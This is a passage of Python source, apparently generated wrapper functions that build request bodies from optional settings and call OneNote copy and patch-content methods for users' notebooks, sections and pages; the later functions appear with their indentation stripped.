    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   notebook_id=notebook_id,
                                   onenote_section_id=onenote_section_id,
                                   onenote_section_id1=onenote_section_id1,
                                   body=body)
def usersactions_usersonenotenotebookssectionsparentsectiongroupsection_copy_to_section_group(
        client, user_id, notebook_id, onenote_section_id, onenote_section_id1,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        notebook_id=notebook_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_section_id1=onenote_section_id1,
                                        body=body)
def usersactions_usersonenotepage_copy_to_section(
        client, user_id, onenote_page_id,
        id_=None, group_id=None, site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section(user_id=user_id,
                                  onenote_page_id=onenote_page_id,
                                  body=body)
def usersactions_usersonenotepage_onenote_patch_content(
        client, user_id, onenote_page_id, commands=None):
    """Call client.onenote_patch_content; commands are sent only when supplied."""
    body = {} if commands is None else {'commands': commands}
    return client.onenote_patch_content(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        body=body)
def usersactions_usersonenotepagesparentnotebook_copy_notebook(
        client, user_id, onenote_page_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupsparentnotebook_copy_notebook(
        client, user_id, onenote_page_id, section_group_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                section_group_id=section_group_id,
                                body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssection_copy_to_notebook(
        client, user_id, onenote_page_id, section_group_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   onenote_page_id=onenote_page_id,
                                   section_group_id=section_group_id,
                                   onenote_section_id=onenote_section_id,
                                   body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssection_copy_to_section_group(
        client, user_id, onenote_page_id, section_group_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        section_group_id=section_group_id,
                                        onenote_section_id=onenote_section_id,
                                        body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssectionspage_copy_to_section(
        client, user_id, onenote_page_id, section_group_id,
        onenote_section_id, onenote_page_id1,
        id_=None, group_id=None, site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section(user_id=user_id,
                                  onenote_page_id=onenote_page_id,
                                  section_group_id=section_group_id,
                                  onenote_section_id=onenote_section_id,
                                  onenote_page_id1=onenote_page_id1,
                                  body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssectionspage_onenote_patch_content(
        client, user_id, onenote_page_id, section_group_id,
        onenote_section_id, onenote_page_id1, commands=None):
    """Call client.onenote_patch_content; commands are sent only when supplied."""
    body = {} if commands is None else {'commands': commands}
    return client.onenote_patch_content(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        section_group_id=section_group_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_page_id1=onenote_page_id1,
                                        body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssectionsparentnotebook_copy_notebook(
        client, user_id, onenote_page_id, section_group_id, onenote_section_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                section_group_id=section_group_id,
                                onenote_section_id=onenote_section_id,
                                body=body)
def usersactions_usersonenotepagesparentnotebooksection_copy_to_notebook(
        client, user_id, onenote_page_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   onenote_page_id=onenote_page_id,
                                   onenote_section_id=onenote_section_id,
                                   body=body)
def usersactions_usersonenotepagesparentnotebooksection_copy_to_section_group(
        client, user_id, onenote_page_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        onenote_section_id=onenote_section_id,
                                        body=body)
def usersactions_usersonenotepagesparentnotebooksectionspage_copy_to_section(
        client, user_id, onenote_page_id, onenote_section_id, onenote_page_id1,
        id_=None, group_id=None, site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section(user_id=user_id,
                                  onenote_page_id=onenote_page_id,
                                  onenote_section_id=onenote_section_id,
                                  onenote_page_id1=onenote_page_id1,
                                  body=body)
def usersactions_usersonenotepagesparentnotebooksectionspage_onenote_patch_content(
        client, user_id, onenote_page_id, onenote_section_id,
        onenote_page_id1, commands=None):
    """Call client.onenote_patch_content; commands are sent only when supplied."""
    body = {} if commands is None else {'commands': commands}
    return client.onenote_patch_content(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_page_id1=onenote_page_id1,
                                        body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentnotebook_copy_notebook(
        client, user_id, onenote_page_id, onenote_section_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                onenote_section_id=onenote_section_id,
                                body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentsectiongroupparentnotebook_copy_notebook(
        client, user_id, onenote_page_id, onenote_section_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                onenote_section_id=onenote_section_id,
                                body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentsectiongroupsection_copy_to_notebook(
        client, user_id, onenote_page_id, onenote_section_id, onenote_section_id1,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   onenote_page_id=onenote_page_id,
                                   onenote_section_id=onenote_section_id,
                                   onenote_section_id1=onenote_section_id1,
                                   body=body)
def usersactions_usersonenotepagesparentnotebooksectionsparentsectiongroupsection_copy_to_section_group(
        client, user_id, onenote_page_id, onenote_section_id, onenote_section_id1,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_section_id1=onenote_section_id1,
                                        body=body)
def usersactions_usersonenotepagesparentsection_copy_to_notebook(
        client, user_id, onenote_page_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   onenote_page_id=onenote_page_id,
                                   body=body)
def usersactions_usersonenotepagesparentsection_copy_to_section_group(
        client, user_id, onenote_page_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        body=body)
def usersactions_usersonenotepagesparentsectionpage_copy_to_section(
        client, user_id, onenote_page_id, onenote_page_id1,
        id_=None, group_id=None, site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section(user_id=user_id,
                                  onenote_page_id=onenote_page_id,
                                  onenote_page_id1=onenote_page_id1,
                                  body=body)
def usersactions_usersonenotepagesparentsectionpage_onenote_patch_content(
        client, user_id, onenote_page_id, onenote_page_id1, commands=None):
    """Call client.onenote_patch_content; commands are sent only when supplied."""
    body = {} if commands is None else {'commands': commands}
    return client.onenote_patch_content(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        onenote_page_id1=onenote_page_id1,
                                        body=body)
def usersactions_usersonenotepagesparentsectionparentnotebook_copy_notebook(
        client, user_id, onenote_page_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksectiongroupsparentnotebook_copy_notebook(
        client, user_id, onenote_page_id, section_group_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                section_group_id=section_group_id,
                                body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksectiongroupssection_copy_to_notebook(
        client, user_id, onenote_page_id, section_group_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   onenote_page_id=onenote_page_id,
                                   section_group_id=section_group_id,
                                   onenote_section_id=onenote_section_id,
                                   body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksectiongroupssection_copy_to_section_group(
        client, user_id, onenote_page_id, section_group_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        section_group_id=section_group_id,
                                        onenote_section_id=onenote_section_id,
                                        body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksection_copy_to_notebook(
        client, user_id, onenote_page_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   onenote_page_id=onenote_page_id,
                                   onenote_section_id=onenote_section_id,
                                   body=body)
def usersactions_usersonenotepagesparentsectionparentnotebooksection_copy_to_section_group(
        client, user_id, onenote_page_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        onenote_page_id=onenote_page_id,
                                        onenote_section_id=onenote_section_id,
                                        body=body)
def usersactions_usersonenotepagesparentsectiongroupparentnotebook_copy_notebook(
        client, user_id, onenote_page_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                onenote_page_id=onenote_page_id,
                                body=body)
def usersactions_usersonenotepagesparentsectiongroupparentnotebooksection_copy_to_notebook(
        client, user_id, onenote_page_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   onenote_page_id=onenote_page_id,
                                   onenote_section_id=onenote_section_id,
                                   body=body)
def usersactions_usersonenotepagesparentsectiongroupparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectiongroupsection_copy_to_notebook(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotepagesparentsectiongroupsection_copy_to_section_group(client,
user_id,
onenote_page_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_page_id=onenote_page_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebook_copy_notebook(client,
user_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspage_copy_to_section(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspage_onenote_patch_content(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspagesparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspagesparentsection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionspagesparentsection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupsparentnotebooksectionsparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspage_copy_to_section(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspage_onenote_patch_content(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentnotebooksection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentnotebooksection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentsection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionspagesparentsection_copy_to_section_group(client,
user_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectiongroupssectionsparentnotebook_copy_notebook(client,
user_id,
section_group_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectiongroupssectionsparentnotebooksection_copy_to_notebook(client,
user_id,
section_group_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
